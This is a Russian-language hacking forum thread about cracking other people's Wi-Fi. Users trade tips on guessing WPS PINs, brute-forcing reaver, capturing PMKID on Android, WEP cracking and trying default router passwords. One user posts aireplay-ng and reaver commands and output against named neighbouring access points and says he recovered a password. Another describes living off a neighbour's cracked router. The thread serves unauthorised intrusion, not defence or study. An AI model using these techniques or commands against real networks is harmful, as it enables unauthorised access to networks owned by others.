[Wi-Fi, BT] Задай вопрос - получи ответ!

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by user100, 25 Apr 2015.

  1. wlk2

    wlk2 New Member

    Joined:
    9 Apr 2019
    Messages:
    56
    Likes Received:
    3
    Reputations:
    0
    Это я в качестве примера привел, у 86414227 вероятность 41%, он не подходит как и все остальные.

    Не понял как может вероятность возрастать, если генератор выдает совсем другой код?

    И еще на сайте в разделе "Оффлайн генератор WPS PIN Companion из Router Scan" для целевого девайса никаких кодов нет, а у меня в проге их два штуки, кому верить?
     
  2. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,135
    Likes Received:
    1,931
    Reputations:
    24
    Значит остается только полный перебор wps.
    Онлайн генератору, который и выдал пинкод с вероятностью 41%. Оффлайн генератор тоже полностью прав, не отдавая никаких пинов вообще. Для d-link 300/320 пин-коды не генерируются из MAC адреса, они берутся из статической последовательности. Генератор по сути, гадает пинкод, на основе пинов от роутеров с близким MAC.

    В роутерскане пинкод выводится на основе известного d-link pin и pin+1 алгоритма. Опираясь только на производителя устройства по MAC, но не на модель устройства.
    Именно так, совет был дан на случай, если подключение не проходит из-за фильтра.
     
    binarymaster likes this.
  3. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    316
    Likes Received:
    22
    Reputations:
    0
    Можно ли получить PMKID с помощью андроида ? Для этого ведь не нужны ни инжект, ни монитор способности от антенны. Можно ли каким-нибудь приложением получать PMKID там ?
     
  4. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,135
    Likes Received:
    1,931
    Reputations:
    24
    binarymaster likes this.
  5. larsenn95

    larsenn95 Member

    Joined:
    3 Oct 2015
    Messages:
    75
    Likes Received:
    18
    Reputations:
    0
    админ-1234 пробуйте в разных вариациях
     
  6. glestwid

    glestwid New Member

    Joined:
    30 Dec 2010
    Messages:
    91
    Likes Received:
    1
    Reputations:
    0
    Подскажите, для взлома WEP через aircrack-ng нужно присутствие на целевой точке присоединенных клиентов?
     
  7. VasiliyP

    VasiliyP Elder - Старейшина

    Joined:
    30 Aug 2011
    Messages:
    365
    Likes Received:
    676
    Reputations:
    11
  8. wlk2

    wlk2 New Member

    Joined:
    9 Apr 2019
    Messages:
    56
    Likes Received:
    3
    Reputations:
    0
  9. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,248
    Reputations:
    148
    Статус темы: Тема закрыта для ответов.
    Это значит, она не для Вас закрыта, а вообще!))
    А про антенны тут много есть!
     
  10. oibz

    oibz New Member

    Joined:
    27 Nov 2018
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    Спрошу тут, или где?
    Перестал платить провайдеру за интернет почти год назад, нет мани, нет услуги , все как положено. Отключил роутер и забыл, присел на ломанный соседский. Сейчас решил проверить и включил роутер, а интернет есть!!! Провайдер старый объединился с другим, зашел в личный кабинет по старому логину, там минус 10 руб. и подпись, что услуга не предоставляется потому как не оплачено, но интернет есть!!
    Что подскажите? Сменить мак адрес ноута и пользоваться? Что это такое ваще - глюк провайдера? Какие мысли?
     
  11. hydra

    hydra Elder - Старейшина

    Joined:
    24 Jul 2015
    Messages:
    3,359
    Likes Received:
    36,698
    Reputations:
    71
    Скорее всего.
    Смена мак вряд ли спасёт.Пользоваться конечно можно.Если баг обнаружат,тебе просто пришлют счёт за весь период.Платить придётся.
    Возможно,провайдер делает это намерено.;)
     
    #5111 hydra, 14 Apr 2019
    Last edited: 14 Apr 2019
  12. aka_google

    aka_google Well-Known Member

    Joined:
    8 Jan 2010
    Messages:
    296
    Likes Received:
    1,851
    Reputations:
    2
    сервер статистики буксует , но по траффику увидят сколько пользовался , как сказал hydra платить придётся , но всё от суммы конечно зависит
     
    quite gray likes this.
  13. wlk2

    wlk2 New Member

    Joined:
    9 Apr 2019
    Messages:
    56
    Likes Received:
    3
    Reputations:
    0
    Почему-то не получается через reaver добыть пароль, зависает на сообщении Found packet with bad FCS.
    На двух точках выловил пины, использовать которые пошел в RS, на третьей даже до пина не добрался всё из-за той же ошибки:

    Code:
    root@kali:~# aireplay-ng -1 0 -a 6C:3B:6B:A2:EE:52 wlan0mon
    No source MAC (-h) specified. Using the device MAC (11:FE:ED:32:EF:58)
    10:57:05  Waiting for beacon frame (BSSID: 6C:3B:6B:A2:EE:52) on channel 4
    
    10:57:06  Sending Authentication Request (Open System)
    
    10:57:08  Sending Authentication Request (Open System)
    10:57:08  Authentication successful
    10:57:08  Sending Association Request
    
    10:57:13  Sending Authentication Request (Open System)
    
    10:57:15  Sending Authentication Request (Open System)
    10:57:15  Authentication successful
    10:57:15  Sending Association Request [ACK]
    10:57:15  Association successful :-) (AID: 1)
    
    root@kali:~# reaver -A -K -N -S -b 6C:3B:6B:A2:EE:52 -i wlan0mon
    
    Reaver v1.6.5 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    
    [+] Waiting for beacon from 6C:3B:6B:A2:EE:52
    [+] Received beacon from 6C:3B:6B:A2:EE:52
    [+] Associated with 6C:3B:6B:A2:EE:52 (ESSID: KIDZ)
    [!] Found packet with bad FCS, skipping...
     
    #5113 wlk2, 14 Apr 2019
    Last edited: 14 Apr 2019
  14. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Я не понимаю, какой смысл использовать reaver, когда весь этот функционал в Router Scan есть, и можно добывать точки по WPS не отходя от кассы (не перезагружаясь в Linux) ?
     
    quite gray and Payer like this.
  15. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,135
    Likes Received:
    1,931
    Reputations:
    24
    Bad FCS (Frame Checksum) - битый пакет, не страшно.
    До пина не доберетесь на этой точке, ибо 6c:3b:6b = Mikrotik Routerboard, у них wps только по нажатию кнопки, пин-кода там нет.
     
  16. wlk2

    wlk2 New Member

    Joined:
    9 Apr 2019
    Messages:
    56
    Likes Received:
    3
    Reputations:
    0
    Через reaver я добыл два пина, после того как не смог этого сделать в RS:

    Code:
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated with FC:F5:28:66:44:9A (ESSID: Anena).
    [*] Waiting for pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Start.
    [*] Sending WPS Message M1...
    [*] PKE: BB5A0B3E25DC09D5ADE7823DE10BA96BA597EE7244349D0465802D29601C4395BA3A1F6A4F082461D9AEDA93106762DB10DC6384B1E306701C0C3BEA0D8B63797304ACF33043210037CCA2CD50BDFEA1665320616D91601A53EC6F49C89EFAF6F9A681533AAB1764E938472DB7D02D3F34AA4D7CEB21210FF62E619C6D38BA3CD58D304A6CE7D6C601FCA5EB142C0A481A01BAAE4AE714FF8364A9A80247C802FB1D9D21D4E7D382851107B0EDF3AD3F5CA01F848934F9FE8E8DD7E2A4289375
    [*] Received WPS Message M2D.
    [*] R-Nonce: DF72D3B20C59693799A960AD087CC877
    [*] Manufacturer: ZyXEL Communications Corp.
    [*] Model Name: Home Internet Center
    [*] Model Number: KEENETIC series
    [*] Serial Number: none
    [*] Device Name: ZyXEL Internet Center
    [-] This AP is not able to service enrollee right now.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [*] Waiting for pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Start.
    [*] Sending WPS Message M1...
    [*] PKE: D91D3629F0CBACC1CAC748F7C72C082E45DB47D3751938ED90EBE251ECA9C025887E8F3179B80C538CBA89A5D116CA9A61373A88451855792B329E8AF330327DB08CD557B9DFD2A30AF71C993A835F6F805E93A4446FA9F7922B067A8EF4D18D7E3551338C33E64F1211AB84EED64A747D2F08FE901DAE5009F0DC6C433F218D4A7EF56E9071F03BF845FC2E512781290D0DD0FD4EA9A51B99E99DC147ABB4FEF1335F752769B8E748E29F9B8AF9635358FECAED041440993938391B53396B4B
    [*] Received WPS Message M2D.
    [*] R-Nonce: DF72D3B20C59693799A960AD087CC877
    [-] This AP is not able to service enrollee right now.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [*] Waiting for pin ""...
    [*] Sending EAPOL Start...
    .
    Из одного из них удалось выловить пароль, второй пока не дается.
     
    #5116 wlk2, 14 Apr 2019
    Last edited: 14 Apr 2019
  17. wlk2

    wlk2 New Member

    Joined:
    9 Apr 2019
    Messages:
    56
    Likes Received:
    3
    Reputations:
    0
    Спасибо за разъяснение. Кто еще из производителей использовать пины не дает?
    И что делать если подключений к ТД нет и выловить ХШ нельзя, есть ли вариант кроме брута?
     
  18. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    У тебя RS WPS client в режиме Enrollee, переключи в Registrar.
     
  19. wlk2

    wlk2 New Member

    Joined:
    9 Apr 2019
    Messages:
    56
    Likes Received:
    3
    Reputations:
    0
    Это я пытался всеми возможными способами поломать WPS Mikrotik, который как оказалось не ломается :D , а документации никакой нет.


    Упарился уже ломать DIR-300, не зря его выше говнодевайсом назвали :D , теперь он сообщает WPS pin not found!

    Вот здесь нашел список пинов, насколько понимаю в RS их использовать не получится из-за ошибки доставки М4, а можно ли сделать так чтобы reaver файлик с кодами прожевал?
     
  20. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    316
    Likes Received:
    22
    Reputations:
    0
    А почему beacon пакет не ловится андроидом, приходится отдельно записывать какой мак какому имени точки соответствует, можно ли андроидом еще и beacon хватать, в котором имя точки.